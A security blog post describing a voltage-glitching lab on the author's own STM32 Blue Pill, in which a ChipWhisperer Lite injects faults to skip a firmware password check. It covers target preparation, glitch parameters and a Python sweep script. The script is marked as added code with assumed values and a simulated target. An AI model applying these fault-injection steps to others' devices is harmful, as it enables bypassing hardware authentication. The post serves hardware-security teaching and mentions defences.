Glitching on STM32 Blue Pill
2025-10-27 05:52:5 Author: payatu.com (view original)

Introduction

With the growing awareness of hardware-level security practices, it is high time that up-and-coming security researchers got their hands dirty with some advanced hardware attacks. With this in mind, I performed a small attack on the STM32 Blue Pill board. In this blog, I will discuss how I managed to skip the execution of a critical instruction on the STM32 microcontroller by injecting faults into the power rail of the circuit.

Sneeze jolts the heart, a Glitch jolts the hardware

It’s a common myth that the heart stops during a sneeze. Instead, the forceful pressure change in the chest during a sneeze can briefly alter your heart rate or rhythm, causing a momentary delay in a heartbeat, but your heart’s electrical system continues to function normally. 

Similarly, hardware needs power and a clock to function normally, and any fault or glitch in the controller's supply voltage or clock will cause it to behave abnormally. Faults in hardware can occur naturally or can be attacker-induced. A well-engineered fault, injected for a controlled amount of time, can produce a specific, repeatable effect that allows a security mechanism to be bypassed.

Voltage fault injection introduces a fault on the power rail of the circuit, causing the voltage to drop or disappear for a very short period, which leads to abnormal behaviour for a brief moment. If the fault lands during the execution of a critical instruction (for example the compare or branch of a password check), the instruction may be skipped or corrupted, bypassing the security feature.

So, let’s start this experiment with a known development board where I will flash my own code and try to bypass some security checks. Before proceeding, let’s prepare our setup and understand the details of voltage fault injection.

Setting Up the Environment

Target Preparation

The target used in this blog post is the STM32 Blue Pill board with the STM32F103C8 controller. The following steps were taken to prepare the target for glitching:

  • Identifying the Glitching Point: Referring to the "power supply scheme" in the controller's datasheet, the point chosen for inserting the glitch was VDD, as it feeds the internal regulator that powers the CPU core.
  • Removing the Decoupling Capacitors: A glitch attack on the power rail is expected to create a brief voltage drop/spike, but there is always something on the board that counteracts such a momentary change. The decoupling capacitors across VDD stabilise the supply line by suppressing high-frequency noise and briefly supplying the controller from their stored charge, so they smooth out exactly the dip we want to create. These capacitors were therefore removed before voltage glitching.

Preparing the CW-Lite

The hardware chosen for inserting the glitch in the target board was ChipWhisperer Lite (CW-Lite). The following connections were made with the target:

  • Glitch port: The "Glitch" SMA port is the dedicated output for injecting a glitch into the target; the CW-Lite's crowbar MOSFET pulls this line to ground for the duration of each pulse. It was connected to the VDD point of the target board, and the same point was connected to an oscilloscope to monitor the power rail.
  • USART Interfacing: The UART pins of the target, i.e., pins A9 (TX) and A10 (RX), were connected to the TIO1 and TIO2 pins of the CW-Lite.
  • Triggering the glitch: Glitching hardware always needs a trigger to know that the target operation is about to start and hence when to insert the glitch. The TX pin of the Blue Pill board, i.e., pin A9, was used as the trigger input to the CW-Lite and was connected to TIO4.
  • Reset: The RESET pin of the target was connected to TIO3 of the ChipWhisperer, so the target can be reset from the script after a glitch that hangs or reboots it.

To control the ChipWhisperer for precise glitching and to configure the glitching parameters, a Python script was written in a Jupyter Notebook.

Glitching Parameters:

Inserting a glitch on the power rail aims to interrupt (short) the power supply for a very short time. For this to work, the glitch must be precise enough that the target does not reset (the chip's own power-on/brown-out reset circuitry will fire if the dip is too deep or too long) while still producing the desired effect.

A few parameters must be controlled to make the glitch well-engineered and to hit the target instruction during its execution. The key parameters are:

  • Glitch Width: How long each glitch pulse lasts, i.e., the duration of the fault injected into the target. Too wide a pulse may reset the target, and too narrow a pulse may have no effect at all. On ChipWhisperer, width is expressed as a percentage of one glitch-clock period and can be set up to 49.8% of the period.
  • Glitch Offset: When the pulse occurs relative to the rising edge of the glitch clock, i.e., where within the clock cycle the fault lands. A pulse may begin anywhere from -49.8% to 49.8% of a period away from the rising edge, which lets the glitch be swept over the entire clock cycle.
  • Repeat: How many consecutive glitch pulses are generated for a single trigger event, allowing several faults to be injected back to back.
  • Ext-offset: The critical parameter that tells the glitcher how many glitch-clock cycles to wait after the trigger before emitting the pulse(s). The trigger can be a signal from the target itself or an external signal. Choosing the right ext_offset is crucial, as it decides whether the pulse lands on the target instruction at all.

Glitching the Target

Now that all the connections and the setup are ready, it is time to glitch the target. Since we do not know the right values for the glitching parameters in advance, it is better to pick a range for each and sweep across it. Of these, "ext_offset" is the most important, because it determines the approximate waiting time after the trigger.

Determining the ext_offset

A logic analyser was used to capture the UART communication and to measure the time between the trigger, i.e., the "Enter password" string sent by the target, and the point at which the wrong password is sent and checked. The delay was read off using the measurement feature of the logic analyser software.

The clock frequency of the CW-Lite glitch module was 100 MHz.

Time period = 1 / clock frequency = 1 / 100 MHz = 10 ns

Time delay = 799.8 µs = 799800 ns

Approx. waiting time = 799800 ns / 10 ns = 79980 clock cycles

Thus, the glitch should be injected roughly 79980 clock cycles after the trigger, so the approximate value of ext_offset should be near 79980. Because UART timing and host-side latency jitter by a few microseconds, the sweep is centred on this value rather than fixed to it.
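Worked example of the parameter planning and sweep loop described in the two sections above (the glitching parameters and the ext_offset calculation). This is added code, not the post's Jupyter notebook. The attributes used on `scope` and `target` are the ChipWhisperer Python API (`scope.glitch.width/offset/repeat/ext_offset`, `scope.arm()`, `scope.io.nrst`, `target.write()`/`target.read()`); the banner strings, the password, the "vulnerable window" and the `SimTarget` stand-in are assumptions so the loop runs offline. With real hardware, `scope` and `target` would come from `cw.scope()` and `cw.target(scope, cw.targets.SimpleSerial)` after the TIO/trigger setup from the connections section.

```python
"""Plan and run a ChipWhisperer voltage-glitch sweep against a UART password check.

Added example. Real API surface: scope.glitch.{ext_offset,width,offset,repeat},
scope.arm(), scope.io.nrst, target.write()/target.read(). Assumed: the banner
strings below, the simulated vulnerable window, and the SimTarget stand-in."""
import itertools
import time
from types import SimpleNamespace

PROMPT = "Enter password"          # assumed target banner; its TX edge is the trigger
SUCCESS = "Authentication Bypass"  # what the post's firmware prints on a bypass
FAIL = "Wrong password"            # assumed normal rejection message


def ext_offset_from_delay(delay_s, glitch_clk_hz):
    """Trigger-to-instruction delay in glitch-module clock cycles
    (the post's measurement: 799.8 us at 100 MHz -> 79980 cycles)."""
    return round(delay_s * glitch_clk_hz)


def sweep_plan(center, window, step, widths, offsets, repeats=(1,)):
    """Cartesian sweep around the computed ext_offset. UART/host jitter means
    the instruction lands somewhere inside the window; width and offset are
    ChipWhisperer percentages of one glitch-clock period (|x| <= 49.8)."""
    ext = range(center - window, center + window + 1, step)
    for e, w, o, r in itertools.product(ext, widths, offsets, repeats):
        yield {"ext_offset": e, "width": w, "offset": o, "repeat": r}


def classify(resp):
    """Sort a serial response into the four outcomes a glitch campaign logs."""
    if SUCCESS in resp:
        return "success"
    if FAIL in resp:
        return "normal"   # pulse landed but had no visible effect
    if PROMPT in resp:
        return "reset"    # pulse too wide/too many: the MCU rebooted and re-printed the banner
    return "mute"         # nothing came back: target hung, needs a reset


def reset_target(scope, settle_s=0.05):
    """Pulse the target's RESET line through the CW-Lite (TIO3 / nrst)."""
    scope.io.nrst = "low"
    time.sleep(settle_s)
    scope.io.nrst = "high_z"


def glitch_once(scope, target, params, password="wrongpass\n", settle_s=0.05):
    """Program the glitch module, arm it on the TX trigger, send a wrong password
    and classify the reply."""
    for name, value in params.items():
        setattr(scope.glitch, name, value)
    scope.arm()                          # waits for the trigger edge on TIO4
    reset_target(scope, settle_s)        # banner goes out -> trigger -> ext_offset countdown
    target.read(timeout=200)             # discard the prompt
    target.write(password)
    resp = target.read(timeout=200)
    status = classify(resp)
    if status == "mute":
        reset_target(scope, settle_s)    # recover a hung target before the next attempt
    return status, resp


def run_sweep(scope, target, plan, stop_on_success=True, settle_s=0.05):
    """Walk the plan, returning [(status, params), ...]; stops at the first bypass."""
    results = []
    for params in plan:
        status, _ = glitch_once(scope, target, params, settle_s=settle_s)
        results.append((status, params))
        if status == "success" and stop_on_success:
            break
    return results


class SimTarget:
    """Constructed stand-in for the Blue Pill so the sweep runs offline: the
    check is 'skipped' only for a moderate pulse inside an assumed window,
    an overly wide or repeated pulse reboots the chip, anything else is normal."""
    WINDOW = range(79965, 79996)

    def __init__(self, scope):
        self.scope, self.buf = scope, ""

    def write(self, data):
        g = self.scope.glitch
        if g.width > 35 or g.repeat > 5:
            self.buf = PROMPT
        elif g.ext_offset in self.WINDOW and 8 <= g.width <= 30:
            self.buf = SUCCESS
        else:
            self.buf = FAIL

    def read(self, timeout=0):
        out, self.buf = self.buf, ""
        return out


def make_sim():
    """Duck-typed scope/target pair with the attributes glitch_once touches."""
    scope = SimpleNamespace(glitch=SimpleNamespace(ext_offset=0, width=0, offset=0, repeat=1),
                            io=SimpleNamespace(nrst="high_z"), arm=lambda: None)
    return scope, SimTarget(scope)


if __name__ == "__main__":
    center = ext_offset_from_delay(799.8e-6, 100e6)            # 79980
    plan = sweep_plan(center, 40, 5, widths=(10, 20, 40), offsets=(-10, 10))
    scope, target = make_sim()
    for status, params in run_sweep(scope, target, plan, settle_s=0):
        print(status, params)
```

The sweep iterates ext_offset in the outer loop so that, for a given timing, all widths are tried before moving on; a "reset" at a given width is useful information (it marks the upper bound for width at that point), so it is logged rather than treated as an error.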

Results

The glitch aims to skip the execution of the password check, which should bypass the authentication and make the target send the string "Authentication Bypass" over serial. Several attempts were needed to obtain a successful glitch.

Conclusion

I hope this blog post has given you the nitty-gritty details of voltage glitching. Getting a successful glitch is unpredictable and not easy. It requires many attempts with different wire lengths and glitching parameters. While performing this attack, I faced certain challenges, and I have tried to share my experience through this post to help others planning to get their hands dirty with such attacks.

To reduce the risk and make glitching attacks harder, certain strategies can be used, and such attacks should be considered when a product is designed. Choosing the right chip is especially important, as many modern chips come with built-in protection against fault injection, such as voltage and clock monitors that reset the device when the supply leaves its specified range.


Source: https://payatu.com/blog/glitching-on-stm32-blue-pill/